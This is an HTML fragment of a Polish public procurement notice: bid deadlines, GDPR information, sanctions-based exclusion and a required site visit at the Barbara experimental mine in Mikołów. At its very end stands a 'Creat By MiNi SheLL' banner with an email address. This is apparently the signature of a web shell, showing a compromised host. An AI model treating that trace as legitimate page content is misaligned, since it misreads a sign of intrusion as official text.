</h3> Wszystkie przesłanki i zakresy zmiany umowy oraz warunki ich wprowadzenia zawiera załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-02 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy treści z pkt. 3.15.) RODO (obowiązek informacyjny):<br/>8. Udostępnione przez Panią/Pana dane nie będą podlegały udostępnieniu do państwa trzeciego lub do organizacji międzynarodowej.<br/>9. Udostępnione przez Panią/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany oraz w formie profilowania.<br/>II. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art.14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art.14 ust. 5 RODO.<br/>Wykluczenie wykonawcy<br/>Z postępowania o udzielenie zamówienia publicznego wyklucza się wykonawcę jeżeli zachodzi którakolwiek z okoliczności<br/>wymienionych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U.2022.835). Powyższe wykluczenie następować będzie na okres trwania ww. okoliczności. <br/>W przypadku wykonawcy wykluczonego na podstawie art. 7 ust. 1 wymienionej wyżej ustawy, zamawiający odrzuca ofertę takiego wykonawcy.<br/>1. Zamawiający nie wymaga wniesienia wadium oraz zabezpieczenia należytego wykonania umowy w niniejszym postępowaniu.<br/>2. Zamawiający nie przewiduje aukcji elektronicznej.<br/>3. Zamawiający nie prowadzi postępowania w celu zawarcia umowy ramowej.<br/>4. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych.<br/>5. Wszystkie koszty związane z uczestnictwem w postępowaniu, w szczególności z przygotowaniem i złożeniem ofert ponosi<br/>Wykonawca składający ofertę. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>Wizja lokalna<br/>Zamawiający zgodnie z artykułem 131 ust. 2 ustawy Prawo zamówień publicznych, ze względu na specyfikę przedmiotu zamówienia, wymaga złożenia oferty po odbyciu przez Wykonawcę wizji lokalnej. Wizja lokalna odbędzie się na terenie Kopalni Doświadczalnej Barbara w Mikołowie w dniach 24.06.2024r. oraz 28.06.2024 r o godzinie 10.00.<br/>Zbiórka na portierni Kopalni Doświadczalnej „Barbara” ul. Podleska 72, Mikołów.<br/>Prosimy o zgłoszenie uczestnictwa w wizji lokalnej na adres e-mail: phachula@gig.eu<br/>W przypadku braku uczestnictwa w wizji lokalnej (w jednym z wyżej wymienionych terminów) oferta zostanie odrzucona na<br/>podstawie art. 226 ust 1 pkt 18) - Zamawiający odrzuca ofertę, jeżeli została złożona bez odbycia wizji lokalnej (…), w przypadku gdy Zamawiający tego wymagał w dokumentach zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com